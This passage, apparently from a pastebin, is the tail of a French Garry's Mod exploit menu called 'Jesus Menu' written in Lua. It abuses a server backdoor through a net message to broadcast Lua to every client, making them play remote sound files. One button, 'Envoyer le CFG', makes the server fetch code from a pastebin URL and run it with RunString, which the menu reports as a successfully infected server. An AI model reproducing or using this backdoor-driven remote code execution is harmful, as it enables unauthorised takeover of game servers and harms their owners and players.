  3708. Macro:SetPos( 260, 1020 )
  3709. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3710. Macro:SetSize( 110, 25 )
  3711. Macro:SetText( "Soundboard - rire 4" )
  3712. Macro.Paint = function()
  3713. surface.SetDrawColor(29, 39, 55)
  3714. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3715. surface.SetDrawColor( 32, 80, 154 )
  3716. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3717. end
  3718. Macro.DoClick = function()
  3719. net.Start(netKey)
  3720. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/rire4.mp3\", \"mono\", function()end )]])")
  3721. net.WriteBit (1)
  3722. net.SendToServer()
  3723. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3724. SploitNotify("Soundboard")
  3725. surface.PlaySound("buttons/blip1.wav")
  3726. end
  3727.  
  3728. local Macro = vgui.Create( "DButton" )
  3729. Macro:SetParent(Targets)
  3730. Macro:SetPos( 260, 1050 )
  3731. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3732. Macro:SetSize( 110, 25 )
  3733. Macro:SetText( "Soundboard - tk défoncer" )
  3734. Macro.Paint = function()
  3735. surface.SetDrawColor(29, 39, 55)
  3736. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3737. surface.SetDrawColor( 32, 80, 154 )
  3738. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3739. end
  3740. Macro.DoClick = function()
  3741. net.Start(netKey)
  3742. net.WriteString("BroadcastLua([[sound.PlayURL( \"http://jesuschristoff.livehost.fr/gmod/upload/tk78/tk%20d%C3%A9foncer.mp3\", \"mono\", function()end )]])")
  3743. net.WriteBit (1)
  3744. net.SendToServer()
  3745. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Soundboard" )
  3746. SploitNotify("Soundboard")
  3747. surface.PlaySound("buttons/blip1.wav")
  3748. end
  3749.  
  3750. local Macro = vgui.Create( "DButton" )
  3751. Macro:SetPos( 650, 280 )
  3752. Macro:SetParent(Controller)
  3753. Macro:SetText( "Récup le CFG" )
  3754. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3755. Macro:SetSize( 180, 30 )
  3756. Macro.Paint = function()
  3757. surface.SetDrawColor(30, 30, 30)
  3758. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3759. surface.SetDrawColor(51, 255, 51)
  3760. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3761. end
  3762. Macro.DoClick = function()
  3763. RunConsoleCommand( "jesuslebg" ) -- What happens when you press the button
  3764. SploitNotify("check la console ma poule")
  3765. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "check la console ma poule" )
  3766. surface.PlaySound("buttons/blip1.wav")
  3767. end
  3768.  
  3769. local Macro = vgui.Create( "DButton" )
  3770. Macro:SetPos( 650, 250 )
  3771. Macro:SetParent(Controller)
  3772. Macro:SetText( "Envoyer le CFG" )
  3773. Macro:SetTextColor( Color(255, 255, 255, 255) )
  3774. Macro:SetSize( 180, 30 )
  3775. Macro.Paint = function()
  3776. surface.SetDrawColor(30, 30, 30)
  3777. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3778. surface.SetDrawColor(184, 134, 11)
  3779. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  3780. end
  3781. Macro.DoClick = function()
  3782. net.Start(netKey)
  3783. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/trJwsWcY\",function(b,l,h,c)RunString(b)end,nil)" )
  3784. net.WriteBit(1)
  3785. net.SendToServer()
  3786. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Serveur infecté avec succès ! :D Clique sur 'Récup le CFG' " )
  3787. SploitNotify("Serveur infecté avec succès !")
  3788. surface.PlaySound("buttons/blip1.wav")
  3789. end
  3790.  
  3791.  
  3792.  
  3793.  
  3794.  
  3795.  
  3796.  
  3797. ------------------------------
  3798. -- OPEN JESUS MENU --
  3799. ------------------------------
  3800. surface.PlaySound("buttons/blip1.wav")
  3801. SploitNotify("Bienvenue sur le Jésus Menu " .. ply:GetName())
  3802.  
  3803. ---------------------------------
  3804. end
  3805. concommand.Add("jesus", Jesus)
  3806. concommand.Add("jesus_scanbd", checkbackdoors)
  3807. ----------------------------------
  3808.  
  3809. else -- if steamid isn't authorized
  3810.  
  3811. surface.CreateFont( "PopupHFont", {
  3812. font = "Segoe UI Light",
  3813. size = 50,
  3814. weight = 1000,
  3815. })
  3816.  
  3817. surface.CreateFont("PopupFont", {
  3818. font = "Segoe UI Light",
  3819. size = 21,
  3820. weight = 300
  3821. })
  3822.  
  3823. concommand.Add("fucked", function()
  3824. local Popup = vgui.Create("DFrame")
  3825. Popup:SetSize( ScrW(), ScrH() )
  3826. Popup:SetPos( 0,0 )
  3827. Popup:SetVisible( true )
  3828. Popup:SetDraggable( false )
  3829. Popup:SetTitle( "" )
  3830. Popup:MakePopup()
  3831. Popup:ShowCloseButton( false )
  3832. Popup.Paint = function(s,w,h)
  3833. surface.SetDrawColor( Color(0,0,0,200) )
  3834. surface.DrawRect( 0,0, w,h )
  3835. surface.SetDrawColor( Color(240,0,0) )
  3836. surface.DrawRect( 0, w/2-Popup:GetTall()/1.520, ScrW(), ScrH()/6.5 )
  3837. surface.SetTextColor(255,255,255)
  3838. surface.SetTextPos(w/5.10, h/2.40)
  3839. surface.SetFont("PopupHFont")
  3840. surface.SetTextPos(w/5.10, h/3)
  3841. surface.DrawText("Erreur")
  3842. surface.SetFont("PopupFont")
  3843. surface.SetTextPos(w/5.10, h/2.50)
  3844. surface.DrawText( "Tu n'as acheté le Jesus Menu," )
  3845. surface.SetTextPos(w/5.10, h/2.40)
  3846. surface.DrawText( "donc tu ne peux pas l'utiliser." )
  3847. surface.SetTextPos(w/5.10, h/2.30)
  3848. surface.DrawText("Merci de contacter Jesus Christ si l'erreur persiste.")
  3849. end
  3850. button = vgui.Create("DButton", Popup)
  3851. button:SetSize(110,32.5)
  3852. button:SetPos(Popup:GetWide()/2+Popup:GetWide()/10, Popup:GetTall()/2.050)
  3853. button:SetText("")
  3854. button.Paint = function(s,w,h)
  3855. surface.SetDrawColor( Color(255,255,255) )
  3856. surface.DrawRect( 0,0, w,h )
  3857. surface.SetDrawColor( Color(80,180,240) )
  3858. surface.DrawRect( 0+3,0+3, w-6,h-6 )
  3859. surface.SetTextColor(255,255,255)
  3860. surface.SetFont("PopupFont")
  3861. surface.SetTextPos(24,5.5)
  3862. surface.DrawText( "Continue" )
  3863. end
  3864. button.DoClick = function(s,w,h)
  3865. Popup:Close()
  3866. end
  3867.  
  3868. end)
  3869. RunConsoleCommand("fucked")
  3870. end]]);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement